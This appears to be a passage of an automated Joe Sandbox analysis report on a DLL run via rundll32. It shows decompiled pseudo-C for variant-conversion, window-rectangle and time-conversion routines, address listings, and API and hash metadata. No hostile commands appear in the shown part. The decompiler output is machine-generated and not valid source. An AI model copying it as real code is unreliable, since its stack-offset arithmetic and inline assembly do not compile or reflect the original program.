								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x10040908;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E10006B11(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E10010578(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E10010578(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E10010578(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E1000E754(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E10010578(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E100014B0(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E10010578(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E10010578(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}



































                                                                        0x1000ece8
                                                                        0x1000eced
                                                                        0x1000ecf8
                                                                        0x1000ecff
                                                                        0x1000ed0b
                                                                        0x1000ed0e
                                                                        0x1000ed13
                                                                        0x1000ed1f
                                                                        0x1000ed22
                                                                        0x1000ed27
                                                                        0x1000ed2b
                                                                        0x1000ed46
                                                                        0x1000ed4f
                                                                        0x1000ed5a
                                                                        0x1000ed5a
                                                                        0x1000ed5e
                                                                        0x1000ed69
                                                                        0x1000ed6b
                                                                        0x1000efec
                                                                        0x1000efec
                                                                        0x1000eff1
                                                                        0x00000000
                                                                        0x1000eff7
                                                                        0x1000eff7
                                                                        0x1000eff7
                                                                        0x1000eff8
                                                                        0x1000f14b
                                                                        0x1000f150
                                                                        0x1000f152
                                                                        0x1000f158
                                                                        0x1000f15b
                                                                        0x1000f15e
                                                                        0x1000f160
                                                                        0x1000f160
                                                                        0x1000f160
                                                                        0x1000f160
                                                                        0x1000f163
                                                                        0x1000f163
                                                                        0x1000f160
                                                                        0x1000f16b
                                                                        0x1000f16e
                                                                        0x1000f170
                                                                        0x1000f172
                                                                        0x1000f174
                                                                        0x1000f174
                                                                        0x1000f176
                                                                        0x1000f179
                                                                        0x1000f186
                                                                        0x1000f18a
                                                                        0x1000f18f
                                                                        0x00000000
                                                                        0x1000f18f
                                                                        0x1000effe
                                                                        0x1000efff
                                                                        0x1000efff
                                                                        0x1000f000
                                                                        0x1000f0ef
                                                                        0x1000f0f4
                                                                        0x1000f0f6
                                                                        0x1000f100
                                                                        0x1000f106
                                                                        0x1000f116
                                                                        0x1000f119
                                                                        0x1000f11e
                                                                        0x1000f127
                                                                        0x1000f131
                                                                        0x1000f135
                                                                        0x1000f13a
                                                                        0x00000000
                                                                        0x1000f13a
                                                                        0x1000f006
                                                                        0x1000f006
                                                                        0x1000f006
                                                                        0x1000f007
                                                                        0x1000f08d
                                                                        0x1000f092
                                                                        0x1000f094
                                                                        0x1000f09e
                                                                        0x1000f0a1
                                                                        0x1000f0b1
                                                                        0x1000f0b4
                                                                        0x1000f0b9
                                                                        0x1000f0c5
                                                                        0x1000f0d5
                                                                        0x1000f0d9
                                                                        0x1000f0de
                                                                        0x00000000
                                                                        0x1000f0de
                                                                        0x1000f009
                                                                        0x1000f009
                                                                        0x1000f00a
                                                                        0x1000f019
                                                                        0x1000f01e
                                                                        0x1000f020
                                                                        0x1000f04a
                                                                        0x1000f04f
                                                                        0x1000f05a
                                                                        0x1000f06a
                                                                        0x1000f06e
                                                                        0x1000f073
                                                                        0x00000000
                                                                        0x1000f073
                                                                        0x1000f020
                                                                        0x1000f00a
                                                                        0x1000f007
                                                                        0x1000f000
                                                                        0x1000eff8
                                                                        0x1000ed71
                                                                        0x1000ed71
                                                                        0x1000efb5
                                                                        0x1000efc5
                                                                        0x1000efc9
                                                                        0x1000efd2
                                                                        0x1000efd6
                                                                        0x1000efe2
                                                                        0x1000efe4
                                                                        0x00000000
                                                                        0x1000ed77
                                                                        0x1000ed77
                                                                        0x1000ed7a
                                                                        0x1000ee87
                                                                        0x1000ee8a
                                                                        0x1000ef8a
                                                                        0x1000ef93
                                                                        0x1000ef97
                                                                        0x1000ef9c
                                                                        0x00000000
                                                                        0x1000ee90
                                                                        0x1000ee90
                                                                        0x1000ee93
                                                                        0x1000ef57
                                                                        0x1000ef60
                                                                        0x1000ef64
                                                                        0x1000ef69
                                                                        0x00000000
                                                                        0x1000ee99
                                                                        0x1000ee99
                                                                        0x1000ee9c
                                                                        0x1000eea2
                                                                        0x1000eea5
                                                                        0x1000ef1e
                                                                        0x1000ef25
                                                                        0x1000ef2b
                                                                        0x1000ef35
                                                                        0x1000ef39
                                                                        0x1000ef3e
                                                                        0x00000000
                                                                        0x1000eea7
                                                                        0x1000eea7
                                                                        0x1000eeaa
                                                                        0x00000000
                                                                        0x1000eeac
                                                                        0x1000eeac
                                                                        0x1000eeaf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000eeaf
                                                                        0x1000eeaa
                                                                        0x1000eea5
                                                                        0x1000ee9c
                                                                        0x1000ee93
                                                                        0x1000ed80
                                                                        0x1000ed80
                                                                        0x1000f197
                                                                        0x1000f1a5
                                                                        0x1000f1b5
                                                                        0x1000f1b9
                                                                        0x1000f1c2
                                                                        0x1000f1c6
                                                                        0x1000f1d2
                                                                        0x1000f1d4
                                                                        0x1000f1d7
                                                                        0x1000f1d7
                                                                        0x1000f1da
                                                                        0x1000f1dd
                                                                        0x1000ed86
                                                                        0x1000ed87
                                                                        0x1000ed87
                                                                        0x1000ed88
                                                                        0x1000eee6
                                                                        0x1000eefc
                                                                        0x1000ef05
                                                                        0x1000ef09
                                                                        0x1000ef0e
                                                                        0x00000000
                                                                        0x1000ed8e
                                                                        0x1000ed8e
                                                                        0x1000ed8e
                                                                        0x1000ed8f
                                                                        0x1000eeb5
                                                                        0x1000eec9
                                                                        0x1000eed2
                                                                        0x1000eed6
                                                                        0x1000eedb
                                                                        0x00000000
                                                                        0x1000ed95
                                                                        0x1000ed95
                                                                        0x1000ed95
                                                                        0x1000ed96
                                                                        0x1000ee5a
                                                                        0x1000ee60
                                                                        0x1000ee73
                                                                        0x1000ee77
                                                                        0x1000ee7c
                                                                        0x00000000
                                                                        0x1000ed9c
                                                                        0x1000ed9c
                                                                        0x1000ed9c
                                                                        0x1000ed9d
                                                                        0x1000ee21
                                                                        0x1000ee27
                                                                        0x1000ee3a
                                                                        0x1000ee3e
                                                                        0x1000ee43
                                                                        0x00000000
                                                                        0x1000ed9f
                                                                        0x1000ed9f
                                                                        0x1000ed9f
                                                                        0x1000eda0
                                                                        0x1000ede7
                                                                        0x1000edf1
                                                                        0x1000edf7
                                                                        0x1000edfa
                                                                        0x1000ee04
                                                                        0x1000ee08
                                                                        0x1000ee0d
                                                                        0x00000000
                                                                        0x1000eda2
                                                                        0x1000eda2
                                                                        0x1000eda3
                                                                        0x1000edb5
                                                                        0x1000edbb
                                                                        0x1000edce
                                                                        0x1000edd2
                                                                        0x1000edd7
                                                                        0x1000f079
                                                                        0x1000f07a
                                                                        0x1000f07d
                                                                        0x1000f07d
                                                                        0x1000eda3
                                                                        0x1000eda0
                                                                        0x1000ed9d
                                                                        0x1000ed96
                                                                        0x1000ed8f
                                                                        0x1000ed88
                                                                        0x1000ed80
                                                                        0x1000ed7a
                                                                        0x1000ed71
                                                                        0x1000f1e9
                                                                        0x1000f1f2
                                                                        0x1000f1f2
                                                                        0x1000f1fc
                                                                        0x1000f20d

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000ECED
                                                                        • VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                        • VariantClear.OLEAUT32(00000007), ref: 1000F07D
                                                                        • VariantClear.OLEAUT32(?), ref: 1000F1F2
                                                                          • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                          • Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F
                                                                        • VariantClear.OLEAUT32(?), ref: 1000F1D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                        • String ID:
                                                                        • API String ID: 2075586698-0
                                                                        • Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                        • Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
                                                                        • Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                        • Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10030B92 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 100304C6: PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                          • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                          • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                          • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                          • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                          • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                          • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • GetWindowRect.USER32 ref: 10030BDC
                                                                          • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                          • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • GetWindowRect.USER32 ref: 10030CA6
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                          • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                          • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                          • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                          • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                        • GetWindowRect.USER32 ref: 10030D79
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                        • String ID:
                                                                        • API String ID: 2136250054-0
                                                                        • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                        • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100134E7 Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E100193FB(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018BEF(_t121);
							__eflags =  *0x1004cdec; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x1004cde8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E10019490(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013780(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019447(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x1004cdf0; // 0xfffff1f0
							_t86 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018BEF( &_v12);
							_t138 =  *0x1004cdec; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019447(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018BEF( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}







































                                                                        0x100134e7
                                                                        0x100134ee
                                                                        0x100134f1
                                                                        0x100134f4
                                                                        0x100134f8
                                                                        0x100134fa
                                                                        0x100136ef
                                                                        0x100136ef
                                                                        0x100136ef
                                                                        0x00000000
                                                                        0x1001350a
                                                                        0x1001350a
                                                                        0x10013510
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013516
                                                                        0x10013520
                                                                        0x10013520
                                                                        0x10013521
                                                                        0x10013526
                                                                        0x10013529
                                                                        0x1001352b
                                                                        0x1001352d
                                                                        0x10013595
                                                                        0x1001359a
                                                                        0x100135a1
                                                                        0x100135a3
                                                                        0x100135de
                                                                        0x100135e0
                                                                        0x100135e3
                                                                        0x100135e8
                                                                        0x100135ea
                                                                        0x100135eb
                                                                        0x100135eb
                                                                        0x100135ed
                                                                        0x100135ef
                                                                        0x100135f2
                                                                        0x100135f5
                                                                        0x100135fa
                                                                        0x100135ff
                                                                        0x10013601
                                                                        0x10013603
                                                                        0x10013608
                                                                        0x1001360a
                                                                        0x1001360e
                                                                        0x1001360e
                                                                        0x1001361b
                                                                        0x10013627
                                                                        0x1001362b
                                                                        0x10013631
                                                                        0x10013634
                                                                        0x10013637
                                                                        0x1001363c
                                                                        0x1001363e
                                                                        0x10013641
                                                                        0x10013646
                                                                        0x10013649
                                                                        0x1001364d
                                                                        0x1001364d
                                                                        0x1001365a
                                                                        0x10013666
                                                                        0x1001366a
                                                                        0x10013670
                                                                        0x10013673
                                                                        0x10013676
                                                                        0x1001367b
                                                                        0x1001367d
                                                                        0x10013680
                                                                        0x10013685
                                                                        0x10013688
                                                                        0x1001368c
                                                                        0x1001368c
                                                                        0x10013699
                                                                        0x1001369e
                                                                        0x100136a0
                                                                        0x100136a3
                                                                        0x100136a6
                                                                        0x00000000
                                                                        0x100136a8
                                                                        0x100136a8
                                                                        0x100136ae
                                                                        0x100136b5
                                                                        0x100136b8
                                                                        0x100136bb
                                                                        0x100136c1
                                                                        0x100136c4
                                                                        0x100136c7
                                                                        0x100136c9
                                                                        0x100136e7
                                                                        0x100136e7
                                                                        0x100136e7
                                                                        0x100136cb
                                                                        0x100136ce
                                                                        0x100136d1
                                                                        0x100136d4
                                                                        0x100136db
                                                                        0x100136db
                                                                        0x00000000
                                                                        0x100136c9
                                                                        0x100136aa
                                                                        0x100136ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100136ac
                                                                        0x100136a6
                                                                        0x100135a5
                                                                        0x100135a6
